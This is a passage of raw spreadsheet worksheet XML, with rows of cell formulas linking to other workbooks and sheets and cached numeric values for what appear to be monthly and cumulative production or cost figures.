      </c>
      <c r="Z22" s="209">
        <f>'[13]9'!$S$79</f>
        <v>3748.92416666667</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]9'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]9'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'8'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]9'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'8'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]9'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]9'!$W$80</f>
        <v>95.3333333333333</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]9'!$X$80</f>
        <v>83.2063967810806</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]9'!$Y$80</f>
        <v>79.2903415183323</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]9'!$T$80</f>
        <v>62.5</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]9'!$U$80</f>
        <v>50.1152263374486</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]9'!$V$80</f>
        <v>32.958026266062</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]9'!$Q$80</f>
        <v>15</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]9'!$R$80</f>
        <v>108.248888888889</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]9'!$S$80</f>
        <v>2713.10472222222</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]9'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]9'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'8'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]9'!$I$56</f>
        <v>1507.33</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'8'!K24</f>
        <v>15000.56</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>294827.09</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]9'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]9'!$R$6</f>
        <v>79.5897435897436</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]9'!$S$6</f>
        <v>84.7771428571429</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]9'!$T$6</f>
        <v>86.1189271173156</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]9'!$O$6</f>
        <v>40.625</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]9'!$P$6</f>
        <v>60.7638888888889</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]9'!$Q$6</f>
        <v>52.5409378036929</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]9'!$L$6</f>
        <v>9.75</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]9'!$M$6</f>
        <v>131.25</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]9'!$N$6</f>
        <v>4325.17</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]9'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'8'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]9'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'8'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]9'!$R$7</f>
        <v>188.717948717949</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]9'!$S$7</f>
        <v>203.708235294118</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]9'!$T$7</f>
        <v>187.986669347006</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]9'!$O$7</f>
        <v>40.625</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]9'!$P$7</f>
        <v>49.1898148148148</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]9'!$Q$7</f>
        <v>50.1558551992225</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]9'!$L$7</f>
        <v>9.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]9'!$M$7</f>
        <v>106.25</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]9'!$N$7</f>
        <v>4128.83</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'8'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'8'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]9'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]9'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]9'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]9'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]9'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]9'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]9'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]9'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]9'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'8'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'8'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]9'!$W$69</f>
        <v>22.9391010891241</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]9'!$X$69</f>
        <v>23.1432003540494</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]9'!$Y$69</f>
        <v>25.3283737849622</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]9'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]9'!$U$69</f>
        <v>55.7037037037037</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]9'!$V$69</f>
        <v>68.041788143829</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]9'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]9'!$R$69</f>
        <v>120.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]9'!$S$69</f>
        <v>5601.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'8'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'8'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]9'!$W$104</f>
        <v>27.5220827522137</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]9'!$X$104</f>
        <v>28.2401091405184</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]9'!$Y$104</f>
        <v>26.0393707854923</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]9'!$T$104</f>
        <v>100</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]9'!$U$104</f>
        <v>100</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]9'!$V$104</f>
        <v>65.3067298347911</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]9'!$Q$104</f>
        <v>24</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]9'!$R$104</f>
        <v>216</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]9'!$S$104</f>
        <v>5376.05</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'8'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'8'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]9'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]9'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]9'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]9'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]9'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]9'!$V$105</f>
        <v>34.064407191448</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]9'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]9'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]9'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'8'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'8'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]9'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]9'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]9'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]9'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]9'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]9'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]9'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]9'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]9'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]9'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]9'!$E$16</f>
        <v>6482</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'8'!H31</f>
        <v>37804</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1410811</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]9'!$I$16</f>
        <v>5148.04</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'8'!K31</f>
        <v>45365.97</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1401414.1</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]9'!$L$16</f>
        <v>57867.4</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>77.1565333333333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'[11]9'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]9'!$E$13</f>
        <v>6519</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'8'!H32</f>
        <v>33813</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1561656</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]9'!$I$13</f>
        <v>4958</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'8'!K32</f>
        <v>28598</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1050076</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]9'!$L$13</f>
        <v>64985.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>129.971232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]9'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]9'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]9'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]9'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]9'!$U$76</f>
        <v>3.7037037037037e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]9'!$V$76</f>
        <v>4.10592808551992e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]9'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]9'!$R$76</f>
        <v>8e-11</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]9'!$S$76</f>
        <v>3.38e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]9'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'8'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]9'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'8'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]9'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]9'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]9'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]9'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]9'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]9'!$U$77</f>
        <v>4.62962962962963e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]9'!$V$77</f>
        <v>61.4652575315855</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]9'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]9'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]9'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]9'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'8'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]9'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'8'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]9'!$L$15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'[11]9'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'8'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]9'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'8'!K35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G36+'8'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'8'!K36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G37+'8'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'8'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]9'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]9'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]9'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'8'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]9'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'8'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]9'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'8'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'8'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]9'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]9'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]9'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'8'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]9'!$V$10</f>
        <v>811</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'8'!X38</f>
        <v>7304</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263411</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]9'!$Y$10</f>
        <v>7861.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'8'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'8'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]9'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]9'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]9'!$R$50</f>
        <v>272.84</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'8'!U39</f>
        <v>2888.44</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>81702.039</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]9'!$V$50</f>
        <v>256</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'8'!X39</f>
        <v>2733</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>81492</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]9'!$Y$50</f>
        <v>1386.986</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'8'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'8'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]9'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]9'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]9'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]9'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]9'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]9'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]9'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]9'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]9'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]9'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]9'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'8'!H41</f>
        <v>2156</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>127132</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]9'!$I$16</f>
        <v>809.93</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'8'!K41</f>
        <v>4282.85</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>125676.39</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]9'!$L$16</f>
        <v>24002.91</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>80.0097</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]9'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]9'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]9'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'8'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
